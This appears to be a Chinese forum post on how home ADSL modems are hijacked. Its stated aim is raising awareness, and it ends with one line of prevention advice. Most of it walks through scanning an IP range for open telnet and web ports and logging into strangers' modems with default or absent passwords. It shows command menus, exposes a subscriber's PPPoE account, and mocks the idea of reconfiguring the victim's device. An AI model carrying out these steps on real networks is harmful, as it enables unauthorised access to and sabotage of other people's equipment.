今天看到有的网友ADSL被黑,为了提高大家的安全意识,消除被黑的恐惧,找来一些资料,让大家知道一下自己是怎么被黑以及一些防黑的方法.
现在用ADSL的人越来越多了,电信局也大力推荐一些带路由的ADSL MODEM,大家都知道,这些ADSL MODEM大多数用Telnet设置,例如中兴ZXDSL,ZyXEL PRESTIGE 642 ADSL Modem。
但是被黑的原因大都是因为用户的安全意识不高造成的。
密码
一般ADSL Modem需要一个密码登陆设置界面,但这个默认密码经常被公开,而电信局也没有提示用户更改,这样的MODEM给用户留下了一个隐患
破坏
ADSL Modem的设置里经常有些敏感选项,如reset、disconnect、reboot等,一旦这些设置改动,你的Modem也许就“废”了
实例
用任意一个扫描器扫自己所处IP段的80,23端口,一会儿就会看到一些IP有回应.
开放80端口的ADSL可以直接用WEB页面控制,打开控制页面前会被要求输入网络密码,不过用户名和密码根据ADSL Modem的品牌和型号不同,可以到它们各自的网站或者google去查到它们的默认用户名和密码,如果ADSL Modem的使用者没有更改它们的话,那么这整个MODEM的控制权就会交给不法入侵者了
开放23端口的,现在Telnet上去:
c:\windows\>telnet x.x.x.x 23
Router Manager Console Version: 1.07
Please enter your password:
要密码?上google找一下相关资料,Login~~
Please enter your password: ****
User Logged in.
Router Setup>
c:\windows\>telnet x.x.x.x 23
*******************
Welcome to Titanium
*******************
GlobespanVirata Inc., Software Release VIK-1.37.020524i/T93.3.13.
Copyright (c) 2001-2002 by GlobespanVirata, Inc.
login:
又要?再google……
上面两个都是要默认密码的,不好玩,看看下面的拍案惊奇:
c:\windows\>telnet x.x.x.x 23
ISIN 6131R Copyright by ARESCOM 2001
Login Success!
没有搞错?我没输入Password啊~~~@_@
ISIN>help
先看看帮助
******* Console Help Menu *******
Available Command:
add add objects in talbe
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM
ISIN>show sysinfo
Vendor: Arescom
Model: ISIN 6131R (Hardware)
Version: 5.3.08B (Software version)
UpTime: 0363:57 (hh:mm)
ISIN>
再看:
c:\windows\>telnet x.x.x.x 23
logged on; type `@exit' to close connection.
>>help
陌生人记得问路:P
Command:
adsl - entry to ADSL menu
default - set all configuration to factory setting
ipoa - entry to IPoA menu
lan - entry to Ethernet menu
list - list status for enabled PVC
manage - entry to management menu
mode - exit this menu and change modem mode
pat - entry to PAT menu
ping - ping IP for testing purpose
pppoa - entry to PPPoA menu
pppoe - entry to PPPoE menu
quick - quick setup
r1483 - entry to RFC1483 menu
restart - reboot modem
rtable - entry to Routing Table menu
save - save and restart modem
show - display configuration of PVC and Ethernet
ver - display software version
Type 'help' or 'help ' for more details
>> show
看看他有什么秘密?
Ethernet ip: 192.168.1.1
Subnet mask: 255.255.255.0
FullDuplex:Enable
DHCP current setting : disable.
DHCP ineffective setting : disable.
PPPoE setting:
Function VPI/VCI CLASS UserID/Authentication
PPPoE 0/35 ubr bnn*******/CHAP <-------账号
LLC=Disable Echo is disabled
PPPoE IP : 218.21.*.*
PAT enabled interface:
Interface IP address
PPPoE 218.21.*.*
PAT incoming table:
No. i/f name|WanIP Port/Protocal Server IP
1 pppoe 23/tcp 192.168.1.1
effective routing table:
route add ppp_route 0.0.0.0 218.21.*.* 00:00:00:00 1 # MAN via ppp_
device
>> ver
Version : 2.80ZE (2.80ZE-H01.2103-FM11.0507A10Z 24/Jul/2001 14:50)
仅仅这样就掌握了整个MODEM的控制权!只要我修改他的配置,他的MODEM就麻烦了,等电信局的人上门维修吧!
预防
安装防火墙,禁止外部连接,更改ADSL Modem默认密码。
